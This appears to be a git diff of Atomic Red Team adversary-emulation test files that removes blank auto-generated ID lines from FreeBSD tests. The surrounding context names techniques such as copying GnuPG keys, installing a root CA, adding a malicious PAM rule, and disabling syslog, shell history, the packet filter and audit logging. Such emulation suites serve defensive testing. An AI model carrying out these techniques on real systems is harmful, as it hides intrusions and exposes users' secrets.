supported_platforms: @@ -167,7 +165,6 @@ atomic_tests: rm -rf #{output_folder} name: sh - name: Copy the users GnuPG directory with rsync (freebsd) - auto_generated_guid: description: | Copy the users GnuPG (.gnupg) directory on a FreeBSD system to a staging folder using the `rsync` command. supported_platforms: diff --git a/atomics/T1553.004/T1553.004.yaml b/atomics/T1553.004/T1553.004.yaml index ebb5adc0..8c3a8c54 100644 --- a/atomics/T1553.004/T1553.004.yaml +++ b/atomics/T1553.004/T1553.004.yaml @@ -28,7 +28,6 @@ atomic_tests: name: sh elevation_required: true - name: Install root CA on FreeBSD - auto_generated_guid: description: | Creates a root CA with openssl supported_platforms: diff --git a/atomics/T1556.003/T1556.003.yaml b/atomics/T1556.003/T1556.003.yaml index 867db80e..896cab85 100644 --- a/atomics/T1556.003/T1556.003.yaml +++ b/atomics/T1556.003/T1556.003.yaml @@ -30,7 +30,6 @@ atomic_tests: cleanup_command: | sudo sed -i "\,#{pam_rule},d" #{path_to_pam_conf} - name: Malicious PAM rule (freebsd) - auto_generated_guid: description: | Inserts a rule into a PAM config and then tests it. diff --git a/atomics/T1562.001/T1562.001.yaml b/atomics/T1562.001/T1562.001.yaml index 2d8a65a2..aa8ffe63 100644 --- a/atomics/T1562.001/T1562.001.yaml +++ b/atomics/T1562.001/T1562.001.yaml @@ -40,7 +40,6 @@ atomic_tests: name: sh elevation_required: true - name: Disable syslog (freebsd) - auto_generated_guid: description: | Disables syslog collection supported_platforms: diff --git a/atomics/T1562.003/T1562.003.yaml b/atomics/T1562.003/T1562.003.yaml index a354b32e..d425611a 100644 --- a/atomics/T1562.003/T1562.003.yaml +++ b/atomics/T1562.003/T1562.003.yaml @@ -19,7 +19,6 @@ atomic_tests: #{evil_command} name: sh - name: Disable history collection (freebsd) - auto_generated_guid: description: | Disables history collection in shells supported_platforms: @@ -119,7 +118,6 @@ atomic_tests: cleanup_command: | export HISTCONTROL=$(echo $TEST) - name: Setting the HISTSIZE environment variable - auto_generated_guid: description: | An Adversary may set the sh history files size environment variable (HISTSIZE) to zero to prevent the logging of commands to the history file after they log out of the system. @@ -157,7 +155,6 @@ atomic_tests: cleanup_command: | export HISTFILE=$(echo $TEST) - name: Setting the HISTFILE environment variable (freebsd) - auto_generated_guid: description: | An Adversary may clear, unset or redirect the history environment variable HISTFILE to prevent logging of commands to the history file after they log out of the system. diff --git a/atomics/T1562.004/T1562.004.yaml b/atomics/T1562.004/T1562.004.yaml index b61def59..7f039135 100644 --- a/atomics/T1562.004/T1562.004.yaml +++ b/atomics/T1562.004/T1562.004.yaml @@ -113,7 +113,6 @@ atomic_tests: ufw enable ufw status verbose - name: Stop/Start Packet Filter - auto_generated_guid: description: | Stop the Packet Filter if installed. supported_platforms: @@ -209,7 +208,6 @@ atomic_tests: { echo y; echo response; } | ufw delete 1 ufw status numbered - name: Add and delete Packet Filter rules - auto_generated_guid: description: | Add and delete a rule on the Packet Filter (PF) if installed and enabled. supported_platforms: diff --git a/atomics/T1562.006/T1562.006.yaml b/atomics/T1562.006/T1562.006.yaml index 540718e3..2cc59018 100644 --- a/atomics/T1562.006/T1562.006.yaml +++ b/atomics/T1562.006/T1562.006.yaml @@ -38,7 +38,6 @@ atomic_tests: name: bash elevation_required: true - name: 'Auditing Configuration Changes on FreeBSD Host' - auto_generated_guid: description: | Emulates modification of auditd configuration files supported_platforms: @@ -98,7 +97,6 @@ atomic_tests: name: bash elevation_required: true - name: 'Logging Configuration Changes on FreeBSD Host' - auto_generated_guid: description: | Emulates modification of syslog configuration. supported_platforms: